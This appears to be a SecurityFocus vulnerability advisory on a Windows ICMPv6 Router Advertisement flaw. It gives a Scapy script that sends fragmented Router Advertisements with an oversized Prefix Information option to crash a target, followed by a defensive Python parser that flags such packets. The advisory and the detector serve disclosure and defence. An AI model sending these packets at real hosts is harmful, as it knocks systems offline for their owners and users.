Microsoft Windows ICMPv6 Router Advertisement Remote Code Execution Vulnerability

The following commands using the Scapy6 packet manipulation program can trigger this issue and cause a denial-of-service condition:

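# Target IPv6 and MAC addresses (placeholders)
v6_dst = "<IPv6 address>"
mac_dst = "<Mac address>"

# Router Advertisement behind a Fragment header, with a Prefix Information option declaring len=255
pkt = IPv6(dst=v6_dst, hlim=255) / IPv6ExtHdrFragment() / ICMPv6ND_RA() / ICMPv6NDOptPrefixInfo(len=255, prefixlen=64, prefix="2001::") / Raw(load='A'*2008)

# Split into fragments of at most 1500 bytes and send each one
l = fragment6(pkt, 1500)
for p in l:
    sendp(Ether(dst=mac_dst)/p, iface="eth0")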
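
A receiver-side check for the packet shape used above, as an added example that is not part of the original advisory: it parses a raw IPv6 packet and flags a Router Advertisement that arrives fragmented (RFC 6980 tells hosts to ignore fragmented Neighbor Discovery messages) or that carries a Prefix Information option whose length field is not 4 (the fixed value in RFC 4861). The function name, finding strings and sample packets are constructed for illustration.

```python
import struct

FRAGMENT, ICMPV6, RA_TYPE, PREFIX_INFO = 44, 58, 134, 3

def inspect_ra(packet: bytes) -> list:
    """Return findings for one raw IPv6 packet (bytes start at the IPv6 header)."""
    findings = []
    if len(packet) < 40 or packet[0] >> 4 != 6:
        return findings
    next_hdr, offset, fragmented = packet[6], 40, False
    if next_hdr == FRAGMENT and len(packet) >= offset + 8:
        next_hdr = packet[offset]
        frag_offset = struct.unpack("!H", packet[offset + 2:offset + 4])[0] >> 3
        if frag_offset != 0:
            return findings          # later fragment: no ICMPv6 header to inspect
        fragmented, offset = True, offset + 8
    # The fixed part of a Router Advertisement is 16 bytes; options follow it.
    if next_hdr != ICMPV6 or len(packet) < offset + 16 or packet[offset] != RA_TYPE:
        return findings
    if fragmented:
        findings.append("fragmented Router Advertisement")
    opt = offset + 16
    while opt + 2 <= len(packet):
        opt_type, opt_len = packet[opt], packet[opt + 1]   # length is in 8-byte units
        if opt_len == 0:
            findings.append("zero-length option")
            break
        if opt_type == PREFIX_INFO and opt_len != 4:
            findings.append(f"Prefix Information length {opt_len}, expected 4")
        opt += opt_len * 8
    return findings

# Constructed sample packets (all-zero addresses, unset checksum), for illustration only.
def ipv6(next_hdr: int, payload: bytes) -> bytes:
    return struct.pack("!IHBB", 6 << 28, len(payload), next_hdr, 255) + bytes(32) + payload

RA = bytes([RA_TYPE, 0]) + bytes(14)
FRAG = bytes([ICMPV6, 0, 0, 1]) + bytes(4)            # offset 0, more-fragments set
NORMAL = ipv6(ICMPV6, RA + bytes([PREFIX_INFO, 4, 64, 0xC0]) + bytes(28))
SUSPECT = ipv6(FRAGMENT, FRAG + RA + bytes([PREFIX_INFO, 255, 64, 0xC0]) + bytes(128))

if __name__ == "__main__":
    for name, pkt in (("normal", NORMAL), ("suspect", SUSPECT)):
        print(name, inspect_ra(pkt))
```
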

Currently we are not aware of any working exploits. If you feel we are in error or if you are aware of more recent information, please mail us at:


Copyright 2010, SecurityFocus